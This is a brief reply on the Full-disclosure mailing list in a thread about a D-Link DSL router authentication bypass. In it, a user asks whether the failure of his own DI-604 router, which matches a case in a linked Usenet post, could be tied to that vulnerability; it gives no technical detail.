Re: [Full-disclosure] D-Link DSL routers authentication bypass

Hello.

Could the D-Link DI-604 story at

<http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2>

be related to this vulnerability?

I have myself also a DI-604 that broke down in exactly the same way as described
above and the above was the only similar case I have yet found on the net.

My suspicion was also that the box had been hacked and your vulnerability post
now shows that exploitable holes in D-Link boxes exist.

-Sebastian